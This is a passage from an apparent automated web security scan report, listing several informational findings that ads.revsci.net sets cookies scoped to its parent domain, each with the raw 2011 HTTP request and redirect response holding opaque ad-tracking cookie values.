rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvtygvObDParz4dd72Y2njSIQ3FDbp4sN6ChluM8oZa8HtprfxwWjGdG1mepx3QOE/G52cE5mWm5D8+OtUcn1RBt6wB8iu4O+ygCedfKIq9/pjGepLhBB7hglaqnjXXwOdio4ZAsM8ewpawXM1Ouitf23beL8MHfsoO+keT9BYchhEqm9bRBMfxM973XWooJnIjN8J5pWnwN1IeYCPQBU6Kcx3ubkKHZeLnuEoDbICb1fVZwiijORoR9besNRbKiC5uO0GiIoH3bGO1QdVZxOERc9d/LzZ/nmdlZXlv7si2lvdgcCQI6WUUzljxKZrFRnDXuEOE8Asdd1no+bVPqW9qzvPG3Wrtf2Ybd7eGUGDovksoYO+38RpX4ztBEhTSSdexPYkwohTdS0NaK+xB69BRlRKyHuBuxIKsmabHJgkXwd9Z2grL3kdEadgUlodh7aEDuYID/6pIxK2fjGISxWSaLQ30ZAt1VAMwTjtcSOYkGu+T0G7Q9hAKyh18R9a7kSQoFt3+9406BJ0FDSG0olaPkhovf+CndgqByq4SVTZPuB/xh7yEugipIGGVwBY/U2DrlIvCKUuwL+//RwzF5htKCQhc/+lP+650tNiXCvqdUIPUtR+BNTxWslVPmzSM+ao3o3H7NjkrWKw4v8lyBbyzVBnccK6yuUPUnnPVIizAqgDS3VZ374z1uNgv2hgmHsV/eGhsi52AXVgVXWpyT8O+1HsgsqYFrmkaSmceEUxZyCN5bQUO9S3Rfc3/cuV8ZSKHzl1ItUlhObKaz0OGKnaJyQOU0rwl6K3hsfNHhFeaC0H9nXjmzh1iY4E3vDLrzwyuKlOQeBXxTNGx0gUfqSvD88i+BX9W6F/8VbBcBt6jvOGLwTBBom9JR2ZjdH+Z51SlYxp/+aJdnZJXk7MdAiuDlkxVF3iSYBYcUlVUFSLYngCDYVhGttXtm++iCdSF2R39SaIsk1YajDZ4Kjv53uHIRVCJ74ir6qNAdf9wTB8BeDDWS1VJcnrP98YZb4p0RPSkeVVUMEN3hdiYUTBqELXGUpTiXXRbbqXdw="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9DNwYYlW0E1idLvS/Qn1LhCaUFAhIyOv+V9d5XY9ZyPsA1wXIiKXHSeIHhw5Y9jFbCC8UE2QspKokupFpwJRvmC3SR9bjpy+u3zTB6wB9GtIz8ey7+WMS5mGiVeVP4eYtlG1LBl0ob101Vu7thOUknm321AigmkLMr4yjsHP8eBisFNrs1nvh2gNJgEKk9VRBMs7RFZlNr5ymNTP01l9tzQDoEJFCjH3S13zOvGsx0rLDJ86CDJ0mu4eG9IMrpSFNX8K1sO/zvYRrWNwogz6Zn68KkMi9882nuR7GooH9qwj4BstXy0Ofqiza9DRIycy7CiZ3m7NNAOZ6W3g6HPohG+1esZzkK/nwVzNWl10tgyc4p5GCPaFG3htjlIfrr4K4BPl1Lr3if8r4pRXhKzS6/xgq6+co31Z69AQ9BFwFuxuFYaskaIXIdp0KMaYqxLrrkVFadgUlpdt7atiGQvZcMMNzDLlzGMUzWSaLQ10Ycp1VHMgTjtYUOYUCu+S0GDsdFrdwfZWATEBCrghCFZRrNnL7tllYBAVppWFlFuK2hUHI6H8KHXaCPbfwT1ZZV+2SMYm5LGVXMO597msQA9q7CRqSaU0kLuSCqy+bJYKz0+NCw0npmJ+WGsgBqOas7wZSnm4lNDmUo3kw2G8q9nKxsXTWRG42E+RJmLUnBesF0e9UOnZUCfUhfFcF1JWDDCFvR8It6Stqkbwg7bW25MkGZZfr7Vurc7ydA1UVkLmTyH8RTofT7n5wOweexEsJCWh+OuXDJ3jhj0dd+BJLM7GeNzY0N8oaYbcMJJ3emWbbF5tp9Rerg2yQYt3Czfy/9/1eesgHvzkF/r4eQL083L5cHxSHN6oyEOvuiBMzEmtM+OhJCc4fFv4jjSWN2Phy1CNOotA1TJWfXOPuxt6/l99OuThD47SGXhSzBI46P5933lUtkXB99ENxHivs63dL/rf5u5kZA8LOhLtuUywXPpQu7If5LILMB8nfsJ7CR8iWTveR/9qzxgpYmB9ncLlXj93saYxct6Jodz/wWiJGUQVkTfOfOvwjDo9/0htEkF0MYVzwSx4M7cw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:55 GMT


12.18. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=.revsci.net, issued by ads.revsci.net; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=4650606513023.377?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gTSf="MLsXsF8ubi5n4JDyDnheiwDql1A60Lsw0wyTHpTkGlKdGbCiOsgce2mqLNp9XQ+oVRFqht3dMO1mX1+8dfVskDjKy2cX/+Z4lnteDZm422W0rSpVxafl8+M3Fk56Oh4ptMD+h/TL16cClJvwhzx3ksiI372OclKk2rrJElMP9zSRn673IT6QntSmNJGRjB9z5zP1BvTF3BWBjl2ihgs4mkfaQEqjt9p+cBVDcmp3g8C/5o7hwOfsvpsaEL2NaEL8Yclw+0Vwxy+NhY8AmK1hLFhm3AjJYvZm7QcK/q0p6GGTtsbZ+yCazwOJc1Va5W5RVdAPXjZwCcYrug1AWdTvw+CX8pl1tT5CvgRtv4wdCIRceojk3s7+FbmOzt1dOtrGM8Ug5CT17KIktYNbeStxehxlUFVwnCxOkk7lLa1gAjSeJOnilkeIzHLo0yuoDlhn88sfkWZXU/94"; 
rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvlyjvObDParz4dd72Y2njSIQ3Ejbp4sN6MhluM8oZa8Httq55yHRxC8ZzYVchSGk4TkgcB56UrzjgJIXREFzLX43WBsxlgpdbj61dOiIg76BvfGJFZsjP1DddUf4Z8ICk59e3Twi7ijmYiu3pu3z9gYxZZMb9f1t4xig0cgrpStqeslISiOQIcB8zs8ypIerbzS2TPeSmKj0IlZ4k6qHdysgn6IsIrCK2Q98rebBMt9EQT7AQofgv7NV7iBmcy63NAkt+/NiUqrZvx04W5DA4ia+7TpPasFKKHfSgdztF7O67saYxqjzbUvN1k101FJXYBhcJIthuYGpmv+PlT6ji0bSPzuEhgTIXUBzWjfYfabIkr73uK0CExEj37ApcDXLd7FAMbtRknaeEB7fkKz4rxUsKv2YRcZodYwnZiTvV6eSWxFTylleEaWo/4nXX5xx1S7tTqLSjGgSabCGAJV9rzysY/Ywii41kWDVJwd4Mcmryv0Ys8mQgF099zvt4sJO4+L0DBmttBohCo/NHH4w2NW42OiNAQ4v4GPM9fmSZQAlcnPV300cuFSHvdVJfFM+aW+M8EZOSYCY4eZcFJa2Ez4slFHRhFwt7knbL+pOhl9sHKdX2WJ5S2MUZXMcRPcLyi8gikA/qwYWacyXvX/j7bL1Z8oNz+hpHu91g4NbGbvsTVn7U8Th+LYMrDLU39ALFt6VYJ1L0qkawvLEB9SU00z0AeCjdrkjdjJio2hvUMBiZekzCXSUKE1qap6PxOuHz+1uPRIe7tHF0pkC8z+3Bxl+3YNWD4Z+z5wOoyfTDeoN6VJFV4ug2qwHGSXyhMY9+w5TEGP8secVB08eHPjvIErmYAytwsIud2fgi9Z/AwXu6Yy7YJ8zhFzWS3rMcBLtpxssv/+CSnTmfVYbZS2C9w8ZQQJx5OTTknGzeKtTBlPIpNfRRbwI5PsznWuAg8gClBY5PUzOIV+9KlSFGBF8/DghOQSRr4a/7fOReWHlosdROghDC46Yc8gDO6qZfdb4Lb+40i3dd/BVkYW5lC3XK8W94VNTG14="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0q4DdGKH3vrseeDWozeseSI8hmVs1y9IiVsnPR7mWvcRq2i/D84TaAa8k5LT4xN0mvOzPwpJrhR300EfJhCEjmBFpjdbk3jl46vifDsQxpSkbUgiDlRIPlPFDddUf4ZwKyGVG8yyZzpc1KlNh+6xHUCydNCWk1pYw2zpCJcy0Xq1ewfSwZgkU8YbWuykXS7fiHQ+7BpC3A9cDo+dBWRC+oLlUiAuI2+OJsqbD3rTZhUcZqf/PHxR44d2yyf16w6rv74vpXGzc03lEFRcLgBiTlqVuFKRCoKYg3hqhE20rtC72XJwbqRf4nqNohc1/W2Rj1Q57pDoa7C/rhV3y1OIkDuM/wU/a2TfzoYbdbeGUGDovksoYO+38RpX4ztBEhTSSdexPYmwohTdS0NaK+7rBfx4LZDgPmZO9m5dZmY/KeiuNJOwZore0i5QDJ+nNyDPl+aqwV68N3+nUC1dgz62t3SR3cAdxXwV0b1N+lT93bHTAYHpmvjFW6LTYO62mmNdMMxE6ZVAMf9Mg3lgWgTpD0AoKv+omt9CweOZkYB167yE24hZJG9BwC0iGnWX+7mmx4f0ilrhSDM8I4HQiJ/LmTmrXGtB2rrsgZ5UyI8PrccHxeXyOrPstSXYvQmVrNJ+nbFs1NhLBfym2WY8l9reQ9vOFVNfN4m3cAlSz0tCntjgnWzbD9T60SDFDdemcbIk/SuIRFhKWOBpg5ALDdhlf0H5WuMPn5Z/o1q3UWmwYf9Xi4EIRBzO0nTds99qepYGtaJZ24V64jJuwYQbKl9ij50Pae3gOxuJ5o/Oh9Kw82gxy35sfQjIwNz7GdtRTXLBMHd+LUbvw6qVpvW5x6vmEtkevPAiSqzuJINH3EtS8s/MDgSBgnRIlq54Jbq0R1xO88si8XtUs/ZcRVgqVtGa9OYQErt0/WvyJiYgBREJX1qLhk72olVr8CMxCo7D3Iqdixu6h1I8iJoaoRrurPDye5dIkrV4oDn582sQqPOfIE9j7DzwcUnBbF5Mwp3rn8l1xx1NDoz9elQZPKNgVDhyjdQtxa1defEdJN3w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:40:49 GMT


12.19. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=.revsci.net, issued by ads.revsci.net; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPF50OBLwIMpzaxu2HQrcQb/coAaHhJAbenh/Nv2MY6n2e1NDCNnYNPat72X0BRE/esU9+EywiROtUTQMbYBq9rnjjNjeUEe32iu1AIHKjKt7Fndxcuv+HBYCNWc2u0r9BSCGY0lWYHj0kddsl153LxKPjEBRX4N7YV+UiL596yc+/XaoxpnMq8ClHjz4GUV1zPVpVxAexnxc2VYk2J5ZWkA6vemmq+Y9/WiNZNbE26sdYD7pwlP0xb58DJLaJ0BMJfjTLY4z5F45OKPR1pmg==; rtc_rnU6=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFukH2RhvePE26HoeBFV5kQJR5W9feBwQwoflnJmU9r6cb2JZX//hGGENc5px9phZOkJGucNggdRkYXvY5K0=; NETSEGS_K08784=d303c7ec11fd6a67&K08784&0&4df176b8&0&&4dcb4af6&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsiPus_2ZJb="MLtHpENqcx5zJhHBQhzgK3He1h3aw0A6X7azDvfHiMlclO1tdu0KektdKeHwXOMUVaY0m0LaKBIUQalgzzr5lW6q66bvi1YGG7mt0omOkv2p3Q6RiqmtjSbwxbOimlKBmUyhIXN9/LP5pQA1ehm/668seCfMvdSvlIxG3tTaJfxJReTn635WKmfzlxcpiRFzYIxojmq5n0Tys9BIlVqMmXcMtRpx"; rsi_us_1000000="pUP1JklHPwIc1Q0VwanxzTdZ2/4zipi5ZKPbd2VLfdV+lkvoeIlE1zSxcznS+KoMhK9YJjmf9c9L18zMUhyaykGFMZvgZU3jUz/3lEOhU8+qOw2xwHoAsehEGwZghimo44CM1p4MyHfzZA4pubseNPAZ4Kq5ZLrL+f2zP54lvTyPjNv5lTWNX3eNlDoYI5sG9IOCN+h++nZnkwV+owEaMWKHRCvMOHtvmIcm+ypY5ReMHXYXlUoOjAl+EMQObFf5oKn272NxtqmL/6LHIlDedDScq+nhOP6NpxNEVO59dmN1MfnbehHp68hDiBM+TmRxuiwlXYMug+KIR0pGFks1aWnkiZuLZPAr9x/5PmrH7yO/xeYpMGHl5ZXnxsnNbTf+L+KFFTnzBb+DMQmY7Xt2MO7m1LJWRIZxrh8jv+ccXEXSLjnwzKY9qynUrWmwVJ+nOQyqEa4OleB/vNRTSKkgls0Lpe2h9As/5kth06ZOY3RR3bruhoruZpRPZnMFnBVLGw/vPThxMoZijl7d9ttwNd2WU7aTfvZuDDtGZBcEVyhi7NEajfyFTDB35Uwu0QI3Ug99pST7MfmQXZVSUeJ7XS1tJSPSDsp8i7ljY13vOyJ7+GDNyblrjs/vDLxJWssKpKc="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:40 GMT


12.20. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain, so every host under that parent domain receives them, not only the host that set them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_TuCq="MLsXsF/uIS5npgAHiuo+xaAquFHWxLtwUwyTL1XC//hXGJaixt9neOzmYVtifz75nnrUC8ggvkGWKGkwE/VBlME+Q/z1CJ1IxSZ/i6GAWifDGU/pc7sD4QgyAm917NYUdYZyh7iBzZslsIabjNz4MeyillaRjQ2YsKPNRrjQY7vW1DkdAuWciLCBhlz/wrCGW8vuVAft0pSKk9JA2l6FMhjfXYeZuIYTQXTpgQkcMpDks5HxwOfsvpsaEL2NaEL8Yclw+0VwG7q3HFFj76/OIf0IMyUZCEcOHojowzGhV8ioE5aV2ws2hZ0IhhV8uOQHffx8KV33w+vWfAfqWVYrunKd0UvFGhzqCyNSeiFSR238HKp/W2VSXnq3hodOv2LuKf+45Dap1xZrLzh5Gi5QTzedauVd/OhMDVTGxhMIICko4xgErqrMKnEgSt2qIeDrG7gw738="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:55:22 GMT


12.21. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain, so every host under that parent domain receives them, not only the host that set them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=7050454176496.714?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
